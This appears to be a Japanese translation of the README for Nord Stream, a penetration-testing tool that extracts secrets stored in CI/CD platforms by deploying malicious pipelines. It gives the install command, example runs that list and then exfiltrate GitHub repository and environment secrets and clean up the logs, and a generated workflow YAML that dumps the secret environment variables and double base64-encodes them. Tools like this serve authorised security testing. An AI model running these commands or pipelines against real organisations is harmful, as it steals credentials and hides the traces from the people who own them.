Nord Stream は、悪意のある パイプラインをデプロイすることで CI/CD 環境内に保存されたシークレットを抽出できるツールです。
現在、Azure DevOps、GitHub、GitLab をサポートしています。
詳細は以下のブログ記事をご覧ください: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
$ pipx install git+https://github.com/synacktiv/nord-stream
`git` も必須です (https://git-scm.com/download/ を参照)。`PATH` 内に存在する必要があります。
## 使用方法
以下に GitHub での簡単な例を示します。最初に、さまざまなシークレットを列挙できます。```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
その後、exfiltrationに進みます:```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment
[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
### 共有引数
一部の引数は [GitHub](#github)、[Azure DevOps](#azure-devops)、[GitLab](#gitlab) 間で共有されています。以下はその例です。
#### トークンの説明
`--describe-token` オプションを使用すると、トークンに関する一般的な情報を表示できます:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
--build-yaml オプションは、パイプラインをデプロイせずにパイプラインファイルを作成するために使用できます。このオプションは、関連するパイプラインを構築するためにさまざまなシークレット名を取得し、カスタムステップを追加するために使用できます:```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
name: command
env:
secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
environment: PROD
#### YAML
`--yaml` オプションを使用して、カスタムパイプラインをデプロイできます:```yml
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: echo "Hello from step 1"
name: step 1
- run: echo "Doing some important stuff here"
name: command
- run: echo "Hello from last step "
name: last step